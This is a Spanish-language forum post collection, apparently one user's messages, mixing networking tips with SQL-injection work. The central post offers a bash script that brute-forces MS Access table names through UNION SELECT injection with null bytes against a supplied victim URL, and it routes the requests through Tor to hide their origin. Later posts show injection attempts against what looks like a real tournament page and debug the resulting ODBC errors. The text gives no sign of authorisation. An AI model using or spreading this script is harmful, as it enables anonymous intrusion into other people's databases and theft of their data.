Mensajes

si sólo tienen un server si, si usan varios por temas de carga y tal no

pero aunque estuvieses en el primer caso, es fácil saltarse el control navegando a través de un proxy

con el firewall del router no creo que se pueda, a no ser que ya sea un router "decente" tipo cisco o linksys de gama alta...

al filtrar en router, deniegas completamente el tráfico en un puerto, sin importar que sea de una aplicación u otra

si usas linux con iptables puedes filtrar lo que quieras

en win supongo que con el firewall tmb se podrá, y si no con alguno gratuito que hay por ahi

pues eso, no te deja, porque en el modem no tienes abiertos los puertos, entonces denega la conexión...

tienes que abrir el puerto que uses, y mediante NAT tunelizarlo a tu PC

prueba a conectarte al pueto 80, o al de telnet...si no puedes, haz una escaneo a ver que puertos tiene abiertos y ve probando con esos

es el Servidor, no debes de poner nada más, pero la ELE, es en minúscula

No lo reconoce, porque no está en el Path del sistema...

usé los que te puedes bajar para openoffice, los hay en mil idiomas, asi que todo es adecuarlo al caso...

probé tu script y no me resuelve el nombre de la tabla...

la verdad que tu script está más completo, pero es que yo estuve... 5 minutos??

lo que creo que tiene bueno el mio, es el uso de socks para anonimizar la inyección como ya dije
y quizás también, que al tirar de diccionario, hay más probabilidades de encontrar la tabla correcta, pero también hace que sea mas lentoooooooo

@ tomrian: si si, funciona, te lo aseguro :p

bueno, me he hecho un mini-script en bash, porque es un toston andar palabra por palabra a ver si suena la flauta , asi que lo he automatizado un poco

el script pide la url donde se quiere inyectar (incluyendo variable, con el =, pero sin valor), un diccionario a usar para el bruteforce, un archivo de salida donde mostrar los resultados, y opcionalmente un trozo de sentencia sql para validar la sentencia completa (vamos, lo que me puso tomrian en su post!:

La manera de lidiar en estos casos es utilizar el resto de la sentencia como parte de tu inyeccion, en este caso en Access un SELECT debe si o si contener una tabla, busca una tabla por adivinación y luego cuando inyectas pones una condición que incluya la %.

)

Y a continuación, pues básicamente se dedica a inyectar, y a recoger los "errores" tirados por la inyección en el fichero de log

Por cierto, está programado para que use algún server socks (en mi caso Tor), para anonimizar nuestra consulta, ya que es bastante canteosa... :p

no es nada eficiente, asi que esta un buennnnnnn rato, pero a mi por lo menos me ha funcionado

os pego el code, si alguien le apetece mejorarlo (ya que empeorarlo creo que es imposible :p), tiene total libertad, pero si lo haceis, me gustaría que me avisarais (más que nada para la próxima vez tener alguna herramienta decente y no esta basurilla )

Código [Seleccionar] Expandir

#!/bin/bash

# Mini MS-Access Table Name Brute Forcing
# Kamsky a.k.a Adonis

CURL=`whereis curl | awk {'print $2'}`

  echo -e "\n\n*****************************************************"
  echo -e "* MS-ACCESS SQL Injection - Table Name bruteforcing *"
  echo -e "*****************************************************\n\n"

if [ $# -lt 3 ]; then
 
  echo -e "\nFormato: $0 URL(variable a inyectar) diccionario archivo_salida [sql_relleno_validar]\n"
  echo -e "Ej: $0 www.host_victima.com/posts.asp?id= dicc.txt  where+'1'+LIKE+'1\n"
  exit 1
    fi

   
  echo -e "Inyectando...\n"


while read linea ; do
if [ $# -eq 4 ]; then
    INJECTION="$1'+UNION+SELECT+1+FROM+$linea+$4+%00"
else
    INJECTION="$1'+UNION+SELECT+1+FROM+$linea+%00"
fi
    echo -e "\n\n- Inyeccion: $INJECTION\n" >> salida_inj
    $CURL -s "$INJECTION" --socks4 127.0.0.1:9050 | grep ODBC >> $3

   done <<< "`cat $2`"


  echo -e "Fin Inyección\n"

salu2

ouuuuuuuu yeah!

parece que ya voy por el buen camino, gracias!!!

por cierto, justo habia encontrado la "chuleta" para ms-access!

p.d.: es un poco "peñazo" lo de tener que "adivinar" las tablas o aplicarle brute-force, pero es lo que toca!!

gracias de nuevo

parece que finalmente con el %00 (null byte), si que "funciona", pero no me da el error que comentas, si no otro...:

torneo.asp?torneo='+UNION+SELECT+TOP 1+1+from+usuarios
[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause.

torneo.asp?torneo=' UNION SELECT 1,1,1 FROM usuarios
[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause.

no se si ese error es porque la tabla no existe, o simplemente porque como pone , hay un error de sintaxis...si fuera este último caso... que hay mal!!???